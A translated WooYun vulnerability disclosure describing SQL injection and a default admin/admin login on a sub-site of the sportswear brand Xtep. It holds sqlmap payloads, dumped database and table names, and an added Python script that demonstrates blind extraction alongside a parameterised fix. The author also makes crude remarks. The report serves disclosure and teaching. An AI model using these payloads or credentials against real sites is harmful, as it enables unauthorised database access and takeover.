
Vulnerability summary    Followers: 24

Defect ID: wooyun-2015-0134366

Title: SQL injection on an Xtep sub-site; the admin back end has a weak password

Vendor: 特步 (Xtep)

Author: phantomer

Submitted: 2015-08-18 22:14

Fixed: 2015-10-03 11:18

Published: 2015-10-03 11:18

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-08-18: details sent to the vendor, awaiting the vendor's handling
2015-08-19: CNCERT (National Internet Emergency Center) could not yet reach the relevant unit; details disclosed only to the reporting body
2015-08-29: details disclosed to core white hats and experts in the relevant field
2015-09-08: details disclosed to regular white hats
2015-09-18: details disclosed to intern white hats
2015-10-03: details disclosed to the public

Brief description:

An Xtep sub-site; judging by the sub-site's name, there should be some lolis on it.

Detailed description:

Site:
http://**.**.**.**/
Built on the ThinkPHP framework.
Let's start with the SQLi.
Click anywhere on the site:
http://**.**.**.**/index.php/Product/detail/id/145

Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://**.**.**.**:80/index.php/Product/detail/id/145' AND 8870=8870 AND 'GuDV'='GuDV
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: http://**.**.**.**:80/index.php/Product/detail/id/-4234' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71676c6b71,0x6451456c7442485a5846,0x71656f7a71),NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://**.**.**.**:80/index.php/Product/detail/id/145' AND SLEEP(5) AND 'qYUZ'='qYUZ
---
[19:57:51] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0.11


A ThinkPHP app, and their modifications still produced a SQLi.
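The "retrieved: ..." lines that follow are what the first of sqlmap's three techniques, boolean-based blind, produces: each probe only answers yes or no, and the database names are rebuilt one character at a time. The script below is an added example, not code from the original report or from the site, and it reproduces that mechanism against an in-memory SQLite database. The schema (a product table, an admin table with username/password columns) is constructed for illustration; the injection point mirrors the ThinkPHP-style route where the last path segment of /index.php/Product/detail/id/145 is pasted into the WHERE clause. MySQL's SUBSTRING()/ASCII() are spelled substr()/unicode() in SQLite, and the UNION payload's 0x... literals are decoded to show the start/end markers sqlmap greps for in the response.

```python
# Added example (not code from the original report): boolean-based blind SQL
# injection reproduced against an in-memory SQLite database. Table and column
# names are assumed for illustration.
import sqlite3


def make_db():
    """Constructed sample schema standing in for the site's MySQL database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER, name TEXT)")
    conn.execute("INSERT INTO product VALUES (145, 'kids runner')")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES ('admin', 'admin')")  # the weak credential from the report
    return conn


def vulnerable_detail(conn, path_id):
    """Vulnerable controller: the path segment is concatenated into the SQL
    string, so a quote in the segment ends the literal and the rest is SQL."""
    sql = "SELECT name FROM product WHERE id = '%s'" % path_id
    return conn.execute(sql).fetchall()


def safe_detail(conn, path_id):
    """Hardened controller: parameter binding, the whole segment is one value."""
    return conn.execute("SELECT name FROM product WHERE id = ?", (path_id,)).fetchall()


def oracle(conn, condition):
    """One probe in the shape sqlmap reported:
    145' AND <condition> AND 'GuDV'='GuDV  -> True when a row comes back."""
    payload = "145' AND (%s) AND 'GuDV'='GuDV" % condition
    return len(vulnerable_detail(conn, payload)) > 0


def blind_extract(conn, subquery, max_len=64):
    """Recover the scalar result of `subquery` one character at a time with a
    binary search on the code point (7 probes per character, not up to 128)."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, "length((%s)) >= %d" % (subquery, pos)):
            break  # past the end of the value
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, "unicode(substr((%s), %d, 1)) > %d" % (subquery, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def decode_hex_literal(lit):
    """Decode a MySQL 0x... string literal as used in sqlmap's UNION payload;
    the three literals are start / random / end markers sqlmap looks for."""
    return bytes.fromhex(lit[2:]).decode("ascii")


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_detail(db, "145' AND 8870=8870 AND 'GuDV'='GuDV"))  # [('kids runner',)]
    print(vulnerable_detail(db, "145' AND 8870=8871 AND 'GuDV'='GuDV"))  # []
    print(safe_detail(db, "145' AND 8870=8870 AND 'GuDV'='GuDV"))        # []
    print(blind_extract(db, "SELECT password FROM admin"))               # admin
    print([decode_hex_literal(h) for h in
           ("0x71676c6b71", "0x6451456c7442485a5846", "0x71656f7a71")])  # ['qglkq', 'dQEltBHZXF', 'qeozq']
```

The two 8870=8870 / 8870=8871 probes are the true/false pair sqlmap uses to confirm the boolean oracle; against the parameterised version the same payload is just a product id that does not exist, which is the fix for the route.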

[19:58:59] [INFO] retrieved: information_schema
[19:58:59] [INFO] retrieved: kidxtep_cctv # there's even a cctv one, what on earth?
[19:59:00] [INFO] retrieved: qcplay_account
[19:59:00] [INFO] retrieved: seehom
[19:59:01] [INFO] retrieved: t_auschint
[19:59:01] [INFO] retrieved: t_bfham
[19:59:02] [INFO] retrieved: t_school
[19:59:03] [INFO] retrieved: t_zth
[19:59:03] [INFO] retrieved: xfym
[19:59:04] [INFO] retrieved: xtep_run
[19:59:04] [INFO] retrieved: z_acrylic
[19:59:05] [INFO] retrieved: z_ago
[19:59:09] [INFO] retrieved: z_atomdesign
[19:59:21] [INFO] retrieved: z_bona
[19:59:28] [INFO] retrieved: z_cl
[19:59:31] [INFO] retrieved: z_ecard
[19:59:35] [INFO] retrieved: z_fliport
[19:59:35] [INFO] retrieved: z_gt
[19:59:36] [INFO] retrieved: z_hongqiao
[19:59:36] [INFO] retrieved: z_hotel
[19:59:36] [INFO] retrieved: z_huaqing
[19:59:37] [INFO] retrieved: z_huili
[19:59:37] [INFO] retrieved: z_isummerfilm
[19:59:37] [INFO] retrieved: z_jinshu
[19:59:38] [INFO] retrieved: z_kalla
[19:59:38] [INFO] retrieved: z_kama
[19:59:38] [INFO] retrieved: z_kidxtep
[19:59:39] [INFO] retrieved: z_led
[19:59:39] [INFO] retrieved: z_lvqingqi
[19:59:40] [INFO] retrieved: z_magic
[19:59:46] [INFO] retrieved: z_mhs
[19:59:47] [INFO] retrieved: z_music
[19:59:50] [INFO] retrieved: z_musicbox
[19:59:51] [INFO] retrieved: z_nices
[19:59:51] [INFO] retrieved: z_only
[19:59:52] [INFO] retrieved: z_qingci
[19:59:53] [INFO] retrieved: z_shengwu
[20:00:02] [INFO] retrieved: z_tea
[20:00:10] [INFO] retrieved: z_tgk
[20:00:10] [INFO] retrieved: z_topsun
[20:00:11] [INFO] retrieved: z_v012
[20:00:11] [INFO] retrieved: z_xingchun
[20:00:11] [INFO] retrieved: z_xmhxs
[20:00:11] [INFO] retrieved: z_xtep
[20:00:12] [INFO] retrieved: z_xteps
[20:00:12] [INFO] retrieved: z_xtop
[20:00:12] [INFO] retrieved: z_yeaping
[20:00:13] [INFO] retrieved: z_yinxiang
[20:00:13] [INFO] retrieved: z_youfan
[20:00:13] [INFO] retrieved: z_zcomputer
[20:00:13] [INFO] retrieved: z_zestrip
[20:00:14] [INFO] retrieved: z_ztravel
[20:00:14] [INFO] retrieved: z_zzwell


No idea which database the little lolis are in.

[20:07:33] [INFO] retrieved: kidxtep_admin # didn't end up needing this, actually.
[20:07:33] [INFO] retrieved: kidxtep_admin_role
[20:07:34] [INFO] retrieved: kidxtep_adsense
[20:07:34] [INFO] retrieved: kidxtep_adsense_category
[20:07:38] [INFO] retrieved: kidxtep_article
[20:07:38] [INFO] retrieved: kidxtep_article_category
[20:07:48] [INFO] retrieved: kidxtep_banner
[20:07:56] [INFO] retrieved: kidxtep_banner_category
[20:07:56] [INFO] retrieved: kidxtep_category
[20:07:57] [INFO] retrieved: kidxtep_config
[20:07:58] [INFO] retrieved: kidxtep_link
[20:07:58] [INFO] retrieved: kidxtep_link_category
[20:07:59] [INFO] retrieved: kidxtep_log
[20:07:59] [INFO] retrieved: kidxtep_log_category
[20:08:00] [INFO] retrieved: kidxtep_module
[20:08:00] [INFO] retrieved: kidxtep_pic
[20:08:01] [INFO] retrieved: kidxtep_show
[20:08:01] [INFO] retrieved: kidxtep_show_category
[20:08:02] [INFO] retrieved: kidxtep_video


Admin back-end URL:
http://**.**.**.**/admin.php/Public/login

username: admin / password: admin


[Screenshot: QQ截图20150815201022.jpg]


I found a few upload points, but they all upload into a directory where PHP is not parsed. Couldn't think of a good way to cross into another directory, or maybe my technique isn't up to it.
I recently picked up a bit of code auditing and wanted to try auditing this code, since the CMS is so badly written that you hit vulnerabilities wherever you click, but the source is nowhere to be found online.
Pinging the IP showed it sits on the same IP as Huanggang Middle School.

[Screenshot: QQ截图20150815201622.jpg]


[Screenshot: QQ截图20150815201702.jpg]


So Xtep is supplying primary-school shoes to the top-scorer middle school... is that really OK?

[Screenshot: QQ截图20150815201834.jpg]

Proof of vulnerability:

(Same database listing, table listing and admin/admin back-end login as in the detailed description above.)


Fix recommendation:

[Screenshot: QQ截图20150815202246.jpg]


You've already walked into 360 hand in hand with smart hardware, so why still not take security seriously?

Copyright notice: please credit the source when reposting: phantomer@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-08-19 11:16

Vendor reply:

CNVD has confirmed the reported vulnerability. No direct handling channel with the software vendor (or the site's operating unit) has been established yet; pending claim.

Latest status:

None